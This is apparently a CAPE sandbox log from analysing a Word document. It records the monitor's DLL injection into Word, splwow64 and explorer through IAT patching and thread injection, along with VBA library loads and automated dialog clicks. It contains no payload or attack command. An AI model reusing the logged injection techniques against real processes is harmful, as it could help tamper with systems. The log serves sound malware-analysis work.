Analysis

Category:  FILE
Package:   doc
Started:   2019-10-10 00:11:52
Completed: 2019-10-10 00:16:27
Duration:  275 seconds
2019-10-10 01:11:55,000 [root] INFO: Date set to: 10-10-19, time set to: 00:11:55, timeout set to: 200
2019-10-10 01:11:55,030 [root] DEBUG: Starting analyzer from: C:\weesndvahu
2019-10-10 01:11:55,030 [root] DEBUG: Storing results at: C:\ULEoWPzTY
2019-10-10 01:11:55,030 [root] DEBUG: Pipe server name: \\.\PIPE\MdgGvTgKXB
2019-10-10 01:11:55,030 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:11:55,030 [root] INFO: Automatically selected analysis package "doc"
2019-10-10 01:11:55,624 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:11:55,638 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:11:55,638 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:11:56,418 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-10-10 01:11:56,418 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:11:56,434 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:11:56,434 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL option
2019-10-10 01:11:56,434 [root] INFO: Analyzer: Package modules.packages.doc does not specify a DLL_64 option
2019-10-10 01:11:56,653 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc" /q" with pid 2360
2019-10-10 01:11:56,653 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:11:56,668 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:11:56,668 [root] DEBUG: Loader: Injecting process 2360 (thread 1912) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:11:56,668 [root] DEBUG: Process image base: 0x2FA00000
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2FB5D000 - 0x77380000
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: Allocated 0x178 bytes for new import table at 0x2FB60000.
2019-10-10 01:11:56,684 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:56,684 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:11:56,684 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2360
2019-10-10 01:11:58,727 [lib.api.process] INFO: Successfully resumed process with pid 2360
2019-10-10 01:11:58,727 [root] INFO: Added new process to list with pid: 2360
2019-10-10 01:11:58,805 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:58,852 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,884 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:58,900 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2360 at 0x747a0000, image base 0x2fa00000, stack from 0x166000-0x170000
2019-10-10 01:11:58,900 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpsh5v7u_m.doc" \q.
2019-10-10 01:11:58,914 [root] INFO: Monitor successfully loaded in process with pid 2360.
2019-10-10 01:11:58,930 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\Comctl32 (0x84000 bytes).
2019-10-10 01:11:59,118 [root] DEBUG: DLL loaded at 0x729E0000: C:\Program Files (x86)\Microsoft Office\Office14\wwlib (0x127b000 bytes).
2019-10-10 01:11:59,148 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-10-10 01:11:59,164 [root] DEBUG: DLL loaded at 0x745F0000: C:\Program Files (x86)\Microsoft Office\Office14\gfx (0x1ab000 bytes).
2019-10-10 01:11:59,180 [root] DEBUG: DLL loaded at 0x74B90000: C:\Windows\system32\WTSAPI32 (0xd000 bytes).
2019-10-10 01:11:59,196 [root] DEBUG: DLL loaded at 0x74B80000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-10-10 01:11:59,368 [root] DEBUG: DLL loaded at 0x71640000: C:\Program Files (x86)\Microsoft Office\Office14\oart (0x1392000 bytes).
2019-10-10 01:11:59,617 [root] DEBUG: DLL loaded at 0x70450000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-10-10 01:11:59,664 [root] DEBUG: DLL loaded at 0x743B0000: C:\Windows\system32\msi (0x240000 bytes).
2019-10-10 01:11:59,694 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:12:00,288 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-10-10 01:12:00,365 [root] DEBUG: DLL loaded at 0x73E00000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-10-10 01:12:00,490 [root] DEBUG: DLL loaded at 0x73D30000: C:\Program Files (x86)\Microsoft Office\Office14\1033\wwintl (0xc9000 bytes).
2019-10-10 01:12:00,599 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:12:00,694 [root] DEBUG: DLL loaded at 0x70390000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS (0xbc000 bytes).
2019-10-10 01:12:00,911 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-10-10 01:12:01,084 [root] DEBUG: DLL loaded at 0x70240000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-10-10 01:12:01,145 [root] DEBUG: DLL loaded at 0x6BD10000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-10-10 01:12:01,177 [root] DEBUG: DLL loaded at 0x6BAA0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-10-10 01:12:01,364 [root] INFO: Announced 32-bit process name:  pid: 154729807
2019-10-10 01:12:01,364 [lib.api.process] WARNING: The process with pid 154729807 is not alive, injection aborted
2019-10-10 01:12:01,380 [root] DEBUG: DLL loaded at 0x6BA50000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-10-10 01:12:01,395 [root] DEBUG: set_caller_info: Adding region at 0x00570000 to caller regions list (kernel32::FindFirstFileExW).
2019-10-10 01:12:01,457 [root] DEBUG: set_caller_info: Adding region at 0x01F60000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:12:01,489 [root] DEBUG: DLL loaded at 0x6B9D0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-10-10 01:12:01,816 [root] DEBUG: DLL loaded at 0x6B9B0000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-10-10 01:12:01,987 [root] DEBUG: DLL loaded at 0x6B990000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-10-10 01:12:02,098 [root] DEBUG: DLL loaded at 0x6B930000: C:\Windows\system32\Winspool.DRV (0x51000 bytes).
2019-10-10 01:12:02,269 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-10-10 01:12:02,285 [root] DEBUG: DLL unloaded from 0x75700000.
2019-10-10 01:12:02,285 [root] DEBUG: DLL loaded at 0x6B900000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:12:02,299 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:12:02,299 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:12:02,299 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:12:02,315 [root] DEBUG: DLL unloaded from 0x6B900000.
2019-10-10 01:12:02,471 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-10-10 01:12:02,487 [root] DEBUG: DLL unloaded from 0x2FA00000.
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x6B830000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:12:02,503 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-10-10 01:12:02,519 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:12:02,519 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:12:02,628 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:12:02,628 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:12:02,658 [root] DEBUG: DLL loaded at 0x6B820000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:12:02,845 [root] DEBUG: DLL loaded at 0x6B6C0000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-10-10 01:12:03,142 [root] DEBUG: DLL loaded at 0x6B6B0000: C:\Windows\system32\profapi (0xb000 bytes).
2019-10-10 01:12:03,424 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-10-10 01:12:03,438 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:12:03,454 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:12:03,470 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-10-10 01:12:03,470 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:12:03,641 [root] DEBUG: DLL loaded at 0x6B470000: C:\Program Files (x86)\Microsoft Office\Office14\GKWord (0x238000 bytes).
2019-10-10 01:12:03,813 [root] DEBUG: DLL unloaded from 0x6B470000.
2019-10-10 01:12:05,184 [modules.auxiliary.human] INFO: Found button "&Yes", clicking it
2019-10-10 01:12:07,311 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 2616
2019-10-10 01:12:07,311 [lib.api.process] INFO: 64-bit DLL to inject is C:\weesndvahu\dll\rOFlTO.dll, loader C:\weesndvahu\bin\FqneazpL.exe
2019-10-10 01:12:07,357 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:07,357 [root] DEBUG: Loader: Injecting process 2616 (thread 2964) with C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,357 [root] DEBUG: Process image base: 0x00000000FF3F0000
2019-10-10 01:12:07,357 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,357 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF404000 - 0x000007FEFF6A0000
2019-10-10 01:12:07,388 [root] DEBUG: InjectDllViaIAT: Allocated 0x204 bytes for new import table at 0x00000000FF410000.
2019-10-10 01:12:07,388 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:07,388 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,404 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2616
2019-10-10 01:12:07,404 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 2616
2019-10-10 01:12:07,404 [lib.api.process] INFO: 64-bit DLL to inject is C:\weesndvahu\dll\rOFlTO.dll, loader C:\weesndvahu\bin\FqneazpL.exe
2019-10-10 01:12:07,404 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:07,404 [root] DEBUG: Loader: Injecting process 2616 (thread 2964) with C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,404 [root] DEBUG: Process image base: 0x00000000FF3F0000
2019-10-10 01:12:07,404 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,404 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:07,404 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:07,420 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2616
2019-10-10 01:12:07,513 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:12:07,529 [root] INFO: Disabling sleep skipping.
2019-10-10 01:12:07,591 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:12:07,591 [root] WARNING: Unable to hook LockResource
2019-10-10 01:12:07,607 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:12:07,622 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2616 at 0x000000006B5D0000, image base 0x00000000FF3F0000, stack from 0x0000000000205000-0x0000000000210000
2019-10-10 01:12:07,622 [root] DEBUG: Commandline: C:\Windows\splwow64.exe 12288.
2019-10-10 01:12:07,622 [root] INFO: Added new process to list with pid: 2616
2019-10-10 01:12:07,622 [root] INFO: Monitor successfully loaded in process with pid 2616.
2019-10-10 01:12:07,654 [root] DEBUG: DLL loaded at 0x000007FEFD270000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:12:07,668 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-10-10 01:12:07,700 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\cryptsp (0x17000 bytes).
2019-10-10 01:12:07,716 [root] DEBUG: DLL loaded at 0x000007FEFC760000: C:\Windows\system32\credssp (0xa000 bytes).
2019-10-10 01:12:07,732 [root] DEBUG: DLL unloaded from 0x000007FEFCB60000.
2019-10-10 01:12:07,746 [root] DEBUG: DLL unloaded from 0x6B930000.
2019-10-10 01:12:07,871 [root] DEBUG: DLL loaded at 0x000007FEF78B0000: C:\Windows\system32\spool\DRIVERS\x64\3\unidrvui (0xdc000 bytes).
2019-10-10 01:12:07,888 [root] DEBUG: DLL loaded at 0x000007FEFC430000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 01:12:07,888 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-10-10 01:12:08,028 [root] DEBUG: DLL loaded at 0x000007FEFA960000: C:\Windows\system32\spool\DRIVERS\x64\3\SendToOneNoteUI (0x12000 bytes).
2019-10-10 01:12:08,059 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,059 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:08,075 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,105 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:08,214 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,214 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,246 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,246 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,292 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,309 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,371 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,403 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,448 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,448 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,496 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,526 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:08,573 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,621 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:08,651 [root] DEBUG: DLL loaded at 0x000007FEF36A0000: C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv (0xb2000 bytes).
2019-10-10 01:12:08,714 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:08,901 [root] DEBUG: DLL loaded at 0x000007FEF9A50000: C:\Windows\system32\FontSub (0x1c000 bytes).
2019-10-10 01:12:08,980 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:09,010 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,010 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:09,026 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,072 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:09,135 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,135 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:09,229 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:09,229 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:09,759 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,040 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:10,072 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,072 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,118 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,150 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,384 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:10,398 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,618 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:10,632 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,632 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,664 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,696 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,726 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:10,773 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,789 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:10,821 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:10,835 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:10,851 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,007 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,007 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:11,039 [root] DEBUG: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\prntvpt (0x2a000 bytes).
2019-10-10 01:12:11,069 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,069 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,085 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,117 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,164 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,164 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,226 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,226 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,273 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,303 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,351 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,490 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,506 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:12:11,553 [root] DEBUG: DLL unloaded from 0x000007FEF9A20000.
2019-10-10 01:12:11,569 [root] DEBUG: DLL loaded at 0x000007FEF7880000: C:\Windows\system32\prntvpt (0x2a000 bytes).
2019-10-10 01:12:11,585 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,585 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,601 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,647 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:11,694 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:11,694 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:11,740 [root] DEBUG: DLL loaded at 0x6B530000: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10 (0x9e000 bytes).
2019-10-10 01:12:11,835 [root] DEBUG: DLL loaded at 0x6B3A0000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-10-10 01:12:11,881 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:12:11,959 [root] DEBUG: DLL loaded at 0x6B2A0000: C:\Windows\system32\WindowsCodecs (0xfb000 bytes).
2019-10-10 01:12:12,832 [root] DEBUG: DLL loaded at 0x6B240000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-10-10 01:12:12,894 [root] DEBUG: DLL loaded at 0x6AFB0000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-10-10 01:12:12,927 [root] DEBUG: set_caller_info: Adding region at 0x00070000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:12:12,973 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-10-10 01:12:13,019 [root] DEBUG: set_caller_info: Adding region at 0x0AE70000 to caller regions list (ntdll::memcpy).
2019-10-10 01:12:13,737 [root] DEBUG: DLL loaded at 0x6AF50000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-10-10 01:12:13,769 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1708
2019-10-10 01:12:13,769 [lib.api.process] INFO: 64-bit DLL to inject is C:\weesndvahu\dll\rOFlTO.dll, loader C:\weesndvahu\bin\FqneazpL.exe
2019-10-10 01:12:13,785 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:13,785 [root] DEBUG: Loader: Injecting process 1708 (thread 0) with C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:13,799 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1712, handle 0x84
2019-10-10 01:12:13,799 [root] DEBUG: Process image base: 0x00000000FFA80000
2019-10-10 01:12:13,799 [root] DEBUG: set_caller_info: Adding region at 0x05610000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:12:13,799 [root] DEBUG: set_caller_info: Adding region at 0x00590000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:12:13,799 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 01:12:13,815 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 01:12:13,815 [root] DEBUG: set_caller_info: Adding region at 0x002D0000 to caller regions list (advapi32::RegCloseKey).
2019-10-10 01:12:13,831 [root] DEBUG: set_caller_info: Adding region at 0x065B0000 to caller regions list (ntdll::memcpy).
2019-10-10 01:12:13,846 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:12:13,862 [root] INFO: Disabling sleep skipping.
2019-10-10 01:12:14,019 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:12:14,019 [root] WARNING: Unable to hook LockResource
2019-10-10 01:12:14,096 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1708 at 0x000000006B5D0000, image base 0x00000000FFA80000, stack from 0x0000000006422000-0x0000000006430000
2019-10-10 01:12:14,096 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-10-10 01:12:14,096 [root] INFO: Added new process to list with pid: 1708
2019-10-10 01:12:14,096 [root] DEBUG: set_caller_info: Adding region at 0x00470000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:12:14,111 [root] INFO: Monitor successfully loaded in process with pid 1708.
2019-10-10 01:12:14,111 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-10-10 01:12:14,111 [root] DEBUG: set_caller_info: Adding region at 0x00010000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:12:14,111 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-10-10 01:12:14,128 [root] DEBUG: set_caller_info: Adding region at 0x05FE0000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:12:14,128 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\rOFlTO.dll.
2019-10-10 01:12:14,128 [root] DEBUG: set_caller_info: Adding region at 0x00660000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:12:14,267 [root] DEBUG: set_caller_info: Adding region at 0x00460000 to caller regions list (advapi32::RegCloseKey).
2019-10-10 01:12:14,454 [root] DEBUG: set_caller_info: Adding region at 0x00640000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:12:14,502 [root] DEBUG: set_caller_info: Adding region at 0x00430000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:12:16,265 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6EE0000 to caller regions list (advapi32::RegNotifyChangeKeyValue).
2019-10-10 01:12:16,592 [root] DEBUG: set_caller_info: Adding region at 0x00310000 to caller regions list (user32::SendMessageA).
2019-10-10 01:12:17,812 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2019-10-10 01:12:19,375 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:19,375 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:19,796 [root] DEBUG: DLL loaded at 0x6AF10000: C:\Program Files (x86)\Microsoft Office\Office14\msproof7 (0x39000 bytes).
2019-10-10 01:12:19,904 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:19,904 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:19,921 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:19,921 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:19,999 [root] DEBUG: DLL unloaded from 0x6B9B0000.
2019-10-10 01:12:20,013 [root] DEBUG: DLL unloaded from 0x751E0000.
2019-10-10 01:12:20,279 [root] DEBUG: DLL unloaded from 0x6B9B0000.
